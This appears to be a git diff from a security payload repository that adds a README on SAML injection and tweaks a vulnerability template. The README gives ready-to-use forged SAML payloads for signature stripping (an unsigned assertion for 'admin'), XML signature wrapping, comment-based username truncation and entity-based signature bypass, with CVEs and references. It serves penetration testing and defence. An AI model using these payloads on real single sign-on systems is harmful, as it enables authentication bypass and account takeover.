z1Ewr(XRX+7J8;$|%1Qd0TXEg4rHw%OfqvZ#jdrcz%-?9{o*y1uF!;iqvlZ8hmZTRu
z12jdwQBQQZoD-BEFcwPZ!zYCAYJkx}2qYW-CiSv{kvpQTq*VDu0egTpDlq^-ayfu;
z0~3PCxM97~PQsl+Y4=U<C@YFXb9iMQYM-pc`8d)0>##BA*Oz=(sQ1j^t)wUPBY@hm
zHJLn*ZeA5L@1HT8Df;;xx9SW<Z%EvC<Q_DU9I~1uLNjr}rWNVRGb5+mW1=?bqDb1h
zXZTmm`A~8^>{22*s}HAAY{jwCTc|eGOMl`bG2M1ho?odkK{VQ})Hpx~WviI_1MEG|
zcXW)P@duxhU{@nc!0cr&XfJchj0)n^^UHNsPE$(>C!%7U<aGIO)4~X;IlQ|936fJD
z?9eGJU3^JXr%J68sWF>nirVmz_>^M5F9seq09V>s62+`(vJ#t6qqnW@m-9Q;u`W&8
zKnc!8e4OqGgnFER;Fn-ZQbwJLp7nU0&A%qW3QoYLG0ly;aud_ajbvD%uA`Xy`fPpr
zR73RS8eFj6V^{$hq8LnktZa*cpx-KbS!K!KBd9XrQ6;LVv6zo~>NIKb)L~UY2wj1r
z7ff@{P)Ev27-Q37woG9kp}T`Gl-XIKU_O)KHBiUBsoIoarNjk>KhF|~5p-q^(F=ZX
zsi{ApJza36&0|*UieZJ+2ke;?<0g}>JI5~z)m2b%)MB{OD+5PNX!Lr>`4fIwLIjg7
za?~!68#cQ^V~_E0(vXvy^9QAqxa*>%{5}@ngLvh<r&JVoM%{+xc!hz{M5L1=+~`Ik
zVjG8AL_ViyF&2iqZ#+^e5(Jr+tU8Sv$|{`Kh4wfxuWTB;s+3z|$)(P;GDCiZIUiGD
zKOl*K_XksR^yCVtqKrpQU5J?N1sy*{IT6`Dkhi}>Y)*|<mw3^X`MM>+{+o}4#;EO5
z%0iC=8_f090vk3U0%OJ?EhQ_RfZ;rU=p$R6ntn`l2D>{b_0{<Do)2%9fn0Yjf~L~O
z<^EjCbun2oPnRO|+<IJ2gW^1&R5UN`@dp^R9!5Jfoe8IfBcEHhIq@o?*t7-9-X5o2
zUZTG$OmM@n;T(hrk+b+fvaSf+YY<)|!>ruf(_gDli<r{kUlXS0X0c&atTz^v7wT&H
z^-M&(i0$fQOi5AD$zz@3nvBV#$C%cD+!E%WDm^nUga|S>wSr!U`p;m4fs8zChw<H?
zUNjUNKj~afdmg-cJ$pOWLCj~@hZL*XSeYWS6K2oS?~ta=uN9^GYBu-e_V#fU?^e{A
zBKw-}3GJ^5ol@|z4+o4zky+lD4Yp_lG8S@-%(u=3`;!lH!@3ozBRn++JKl?(<Tl5{
zp0)PH;?Hc~3QoV)&Gt0)Qh&<5@EoeY^vIILU*bKF4_$(8FwQ{-<9vUzd~sj-{``8}
zM?b4B_+pRpPh!N)wX3TKML*@@)Ns;HLz8IkaB?FJ=%v>ZssA-q>$JFJ(>X~8={EH|
zXUeOQ#D4jlBW-%dyxd68&!^+esh%S>=7Kv=%kv2+a%Q4bLfdCKYMJj?z^zxL`uJ(x
z0(SM0ALTb9P2dP=H0^$@;_8))7qKxE0WKOl6@n~E+Fk9sa4G1kfS-kV82PJ1>pk81
paNAq|y}w03Mf(3v-$}Zb|6w?&ec$t5^S}R2)RdpXsuZmv{tJz)c)tJu

literal 0
HcmV?d00001

diff --git a/SAML Injection/README.md b/SAML Injection/README.md
new file mode 100644
index 0000000..ad6ae16
--- /dev/null
+++ b/SAML Injection/README.md	
@@ -0,0 +1,168 @@
+# SAML Injection
+
+> Security Assertion Markup Language (SAML) is an open standard that allows security credentials to be shared by multiple computers across a network. When using SAML-based Single Sign-On (SSO), three distinct parties are involved. There is a user (the so-called principal), an IDentity Provider (IDP), and a cloud application Service Provider (SP).  - centrify
+
+## Summary
+
+* [Tools](#tools)
+* [Authentication Bypass](#authentication-bypass)
+  * [Invalid Signature](#invalid-signature)
+  * [Signature Stripping](#signature-stripping)
+  * [XML Signature Wrapping Attacks](#xml-signature-wrapping-attacks)
+  * [XML Comment Handling](#xml-comment-handling)
+  * [XML External Entity](#xml-external-entity)
+
+## Tools
+
+- [SAML Raider - Burp Extension](https://github.com/SAMLRaider/SAMLRaider)
+
+
+## Authentication Bypass
+
+A SAML Response should contain the `<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"`.
+
+### Invalid Signature
+
+Signatures which are not signed by a real CA are prone to cloning. Ensure the signature is signed by a real CA. If the certificate is self-signed, you may be able to clone the certificate or create your own self-signed certificate to replace it.
+
+### Signature Stripping
+
+> [...]accepting unsigned SAML assertions is accepting a username without checking the password - @ilektrojohn
+
+The goal is to forge a well formed SAML Assertion without signing it. For some default configurations if the signature section is omitted from a SAML response, then no signature verification is performed.
+
+Example of SAML assertion where `NameID=admin` without signature.
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://localhost:7001/saml2/sp/acs/post" ID="id39453084082248801717742013" IssueInstant="2018-04-22T10:28:53.593Z" Version="2.0">
+    <saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" Format="urn:oasis:names:tc:SAML:2.0:nameidformat:entity">REDACTED</saml2:Issuer>
+    <saml2p:Status xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol">
+        <saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" />
+    </saml2p:Status>
+    <saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" ID="id3945308408248426654986295" IssueInstant="2018-04-22T10:28:53.593Z" Version="2.0">
+        <saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">REDACTED</saml2:Issuer>
+        <saml2:Subject xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
+            <saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameidformat:unspecified">admin</saml2:NameID>
+            <saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
+                <saml2:SubjectConfirmationData NotOnOrAfter="2018-04-22T10:33:53.593Z" Recipient="http://localhost:7001/saml2/sp/acs/post" />
+            </saml2:SubjectConfirmation>
+        </saml2:Subject>
+        <saml2:Conditions NotBefore="2018-04-22T10:23:53.593Z" NotOnOrAfter="2018-0422T10:33:53.593Z" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
+            <saml2:AudienceRestriction>
+                <saml2:Audience>WLS_SP</saml2:Audience>
+            </saml2:AudienceRestriction>
+        </saml2:Conditions>
+        <saml2:AuthnStatement AuthnInstant="2018-04-22T10:28:49.876Z" SessionIndex="id1524392933593.694282512" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
+            <saml2:AuthnContext>
+                <saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef>
+            </saml2:AuthnContext>
+        </saml2:AuthnStatement>
+    </saml2:Assertion>
+</saml2p:Response>
+```
+
+### XML Signature Wrapping Attacks
+
+XML Signature Wrapping (XSW) attack, some implementations check for a valid signature and match it to a valid assertion, but do not check for multiple assertions, multiple signatures, or behave differently depending on the order of assertions.
+
+- XSW1 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response after the existing signature.
+- XSW2 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response before the existing signature.
+- XSW3 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion before the existing Assertion.
+- XSW4 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion after the existing Assertion.
+- XSW5 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed at the end of the SAML message.
+- XSW6 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed after the original signature.
+- XSW7 – Applies to SAML Assertion messages. Add an “Extensions” block with a cloned unsigned assertion.
+- XSW8 – Applies to SAML Assertion messages. Add an “Object” block containing a copy of the original assertion with the signature removed.
+
+
+In the following example, these terms are used.
+
+- FA: Forged Assertion
+- LA: Legitimate Assertion
+- LAS: Signature of the Legitimate Assertion
+
+```xml
+<SAMLResponse>
+  <FA ID="evil">
+      <Subject>Attacker</Subject>
+  </FA>
+  <LA ID="legitimate">
+      <Subject>Legitimate User</Subject>
+      <LAS>
+         <Reference Reference URI="legitimate">
+         </Reference>
+      </LAS>
+  </LA>
+</SAMLResponse>
+```
+
+In the Github Enterprise vulnerability, this request would verify and create a sessions for `Attacker` instead of `Legitimate User`, even if `FA` is not signed.
+
+
+### XML Comment Handling
+
+A threat actor who already has authenticated access into a SSO system can authenticate as another user without that individual’s SSO password. This [vulnerability](https://www.bleepstatic.com/images/news/u/986406/attacks/Vulnerabilities/SAML-flaw.png) has multiple CVE in the following libraries and products.
+
+- OneLogin - python-saml - CVE-2017-11427
+- OneLogin - ruby-saml - CVE-2017-11428
+- Clever - saml2-js - CVE-2017-11429
+- OmniAuth-SAML - CVE-2017-11430
+- Shibboleth - CVE-2018-0489
+- Duo Network Gateway - CVE-2018-7340
+
+Researchers have noticed that if an attacker inserts a comment inside the username field in such a way that it breaks the username, the attacker might gain access to a legitimate user's account.
+
+```xml
+<SAMLResponse>
+    <Issuer>https://idp.com/</Issuer>
+    <Assertion ID="_id1234">
+        <Subject>
+            <NameID>user@user.com<!--XMLCOMMENT-->.evil.com</NameID>
+```
+Where `user@user.com` is the first part of the username, and `.evil.com` is the second.
+
+### XML External Entity
+
+An alternative exploitation would use `XML entities` to bypass the signature verification, since the content will not change, except during XML parsing.
+
+In the following example:
+- `&s;` will resolve to the string `"s"`
+- `&f1;` will resolve to the string `"f1"`
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE Response [
+  <!ENTITY s "s">
+  <!ENTITY f1 "f1">
+]>
+<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol"
+  Destination="https://idptestbed/Shibboleth.sso/SAML2/POST"
+  ID="_04cfe67e596b7449d05755049ba9ec28"
+  InResponseTo="_dbbb85ce7ff81905a3a7b4484afb3a4b"
+  IssueInstant="2017-12-08T15:15:56.062Z" Version="2.0">
+[...]
+  <saml2:Attribute FriendlyName="uid"
+    Name="urn:oid:0.9.2342.19200300.100.1.1"
+    NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+    <saml2:AttributeValue>
+      &s;taf&f1;
+    </saml2:AttributeValue>
+  </saml2:Attribute>
+[...]
+</saml2p:Response>
+```
+
+The SAML response is accepted by the service provider. Due to the vulnerability, the service provider application reports "taf" as the value of the "uid" attribute.
+
+## References
+
+- [SAML Burp Extension - ROLAND BISCHOFBERGER - JULY 24, 2015](https://blog.compass-security.com/2015/07/saml-burp-extension/)
+- [The road to your codebase is paved with forged assertions - @ilektrojohn - March 13, 2017](http://www.economyofmechanism.com/github-saml)
+- [SAML_Security_Cheat_Sheet.md - OWASP](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SAML_Security_Cheat_Sheet.md)
+- [On Breaking SAML: Be Whoever You Want to Be - Juraj Somorovsky, Andreas Mayer, Jorg Schwenk, Marco Kampmann, and Meiko Jensen](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91-8-23-12.pdf)
+- [Making Headlines: SAML - March 19, 2018 - Torsten George](https://blog.centrify.com/saml/)
+- [Vulnerability Note VU#475445 - 2018-02-27 - Carnegie Mellon University](https://www.kb.cert.org/vuls/id/475445/)
+- [ORACLE WEBLOGIC - MULTIPLE SAML VULNERABILITIES (CVE-2018-2998/CVE-2018-2933) - Denis Andzakovic - Jul 18, 2018](https://pulsesecurity.co.nz/advisories/WebLogic-SAML-Vulnerabilities)
+- [Truncation of SAML Attributes in Shibboleth 2 - 2018-01-15 - redteam-pentesting.de](https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-013/-truncation-of-saml-attributes-in-shibboleth-2)
+- [Attacking SSO: Common SAML Vulnerabilities and Ways to Find Them - March 7th, 2017 - Jem Jensen](https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/)
\ No newline at end of file
diff --git a/_template_vuln/README.md b/_template_vuln/README.md
index 405a0ca..9081230 100644
--- a/_template_vuln/README.md
+++ b/_template_vuln/README.md
@@ -2,17 +2,18 @@
 
 > Vulnerability description - reference
 
-Tools:
-
-- [Tool name - description](https://example.com)
-
 ## Summary
 
-* [Something](#something)
+- [Tools](#tools)
 * [Something](#something)
   * [Subentry 1](#sub1)
   * [Subentry 2](#sub2)
 
+## Tools
+
+- [Tool 1](https://example.com)
+- [Tool 2](https://example.com)
+
 ## Something
 
 Quick explanation